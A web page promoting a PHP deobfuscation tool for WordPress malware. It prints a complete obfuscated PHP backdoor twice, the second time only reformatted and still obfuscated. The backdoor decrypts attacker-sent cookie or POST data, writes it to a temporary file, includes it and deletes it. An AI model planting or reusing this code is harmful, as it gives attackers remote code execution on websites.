Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php function sd1($dh2){$vt3 = "lo-uy8x2in9msI" ."163h(#k_)E" ."/Lve?F;gc* 'drH7@.p4t" ."a50" ."f<" ."b" ;$tt5='';foreach($dh2 as $yx4){$tt5.=$vt3[$yx4];}return $tt5;}$mc6 = Array();$mc6[] = sd1(Array(16,39,15,43,46,48,50,43,2,47,7,39,45,2,43,39,47,48,2,5,32,15,27,2,32,27,5,47,7,10,27,36,27,1...



Obfuscated php code

<?php function sd1($dh2){$vt3 = "lo-uy8x2in9msI" ."163h(#k_)E" ."/Lve?F;gc* 'drH7@.p4t" ."a50" ."f<" ."b" ;$tt5='';foreach($dh2 as $yx4){$tt5.=$vt3[$yx4];}return $tt5;}$mc6 = Array();$mc6[] = sd1(Array(16,39,15,43,46,48,50,43,2,47,7,39,45,2,43,39,47,48,2,5,32,15,27,2,32,27,5,47,7,10,27,36,27,15,14,7));$mc6[] = sd1(Array(28,42,17,42,34,40,3,9,0,8,9,20,18,21,21,29,13,25,23,21,21,22,30,34));$mc6[] = sd1(Array(41,11,1,36,3,0,27));$mc6[] = sd1(Array(38,33));$mc6[] = sd1(Array(41,24));$mc6[] = sd1(Array(19));$mc6[] = sd1(Array(49));$mc6[] = sd1(Array(48,8,0,27,21,42,3,44,21,32,1,9,44,27,9,44,12));$mc6[] = sd1(Array(45,37,37,45,4,21,11,27,37,31,27));$mc6[] = sd1(Array(12,44,37,21,37,27,42,27,45,44));$mc6[] = sd1(Array(27,6,42,0,1,36,27));$mc6[] = sd1(Array(12,3,50,12,44,37));$mc6[] = sd1(Array(3,9,0,8,9,20));$mc6[] = sd1(Array(12,44,37,0,27,9));$mc6[] = sd1(Array(42,45,32,20));$mc6[] = sd1(Array(11,36,46));foreach ($mc6[8]($_COOKIE, $_POST) as $wa14 => $dd11){function pa8($mc6, $wa14, $bt10){return $mc6[11]($mc6[9]($wa14 . $mc6[0], ($bt10 / $mc6[13]($wa14)) + 1), 0, $bt10);}function oj7($mc6, $ec12){return @$mc6[14]($mc6[3], $ec12);}function hk9($mc6, $ec12){if (isset($ec12[2])) {$sq13 = $mc6[4] . $mc6[15]($mc6[0]) . $mc6[2];@$mc6[7]($sq13, $mc6[6] . $mc6[1] . $ec12[1]($ec12[2]));@include($sq13);@$mc6[12]($sq13);exit();}}$dd11 = oj7($mc6, $dd11);hk9($mc6, $mc6[10]($mc6[5], $dd11 ^ pa8($mc6, $wa14, $mc6[13]($dd11))));}

Decoded(de-Obfuscated) php code

<?php

function sd1($dh2)
{
    $vt3 = "lo-uy8x2in9msI163h(#k_)E/Lve?F;gc* 'drH7@.p4ta50f<b";
    $tt5 = '';
    foreach ($dh2 as $yx4) {
        $tt5 .= $vt3[$yx4];
    }
    return $tt5;
}
$mc6 = array();
$mc6[] = sd1(array(16, 39, 15, 43, 46, 48, 50, 43, 2, 47, 7, 39, 45, 2, 43, 39, 47, 48, 2, 5, 32, 15, 27, 2, 32, 27, 5, 47, 7, 10, 27, 36, 27, 15, 14, 7));
$mc6[] = sd1(array(28, 42, 17, 42, 34, 40, 3, 9, 0, 8, 9, 20, 18, 21, 21, 29, 13, 25, 23, 21, 21, 22, 30, 34));
$mc6[] = sd1(array(41, 11, 1, 36, 3, 0, 27));
$mc6[] = sd1(array(38, 33));
$mc6[] = sd1(array(41, 24));
$mc6[] = sd1(array(19));
$mc6[] = sd1(array(49));
$mc6[] = sd1(array(48, 8, 0, 27, 21, 42, 3, 44, 21, 32, 1, 9, 44, 27, 9, 44, 12));
$mc6[] = sd1(array(45, 37, 37, 45, 4, 21, 11, 27, 37, 31, 27));
$mc6[] = sd1(array(12, 44, 37, 21, 37, 27, 42, 27, 45, 44));
$mc6[] = sd1(array(27, 6, 42, 0, 1, 36, 27));
$mc6[] = sd1(array(12, 3, 50, 12, 44, 37));
$mc6[] = sd1(array(3, 9, 0, 8, 9, 20));
$mc6[] = sd1(array(12, 44, 37, 0, 27, 9));
$mc6[] = sd1(array(42, 45, 32, 20));
$mc6[] = sd1(array(11, 36, 46));
foreach ($mc6[8]($_COOKIE, $_POST) as $wa14 => $dd11) {
    function pa8($mc6, $wa14, $bt10)
    {
        return $mc6[11]($mc6[9]($wa14 . $mc6[0], $bt10 / $mc6[13]($wa14) + 1), 0, $bt10);
    }
    function oj7($mc6, $ec12)
    {
        return @$mc6[14]($mc6[3], $ec12);
    }
    function hk9($mc6, $ec12)
    {
        if (isset($ec12[2])) {
            $sq13 = $mc6[4] . $mc6[15]($mc6[0]) . $mc6[2];
            @$mc6[7]($sq13, $mc6[6] . $mc6[1] . $ec12[1]($ec12[2]));
            @(include $sq13);
            @$mc6[12]($sq13);
            exit;
        }
    }
    $dd11 = oj7($mc6, $dd11);
    hk9($mc6, $mc6[10]($mc6[5], $dd11 ^ pa8($mc6, $wa14, $mc6[13]($dd11))));
}


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.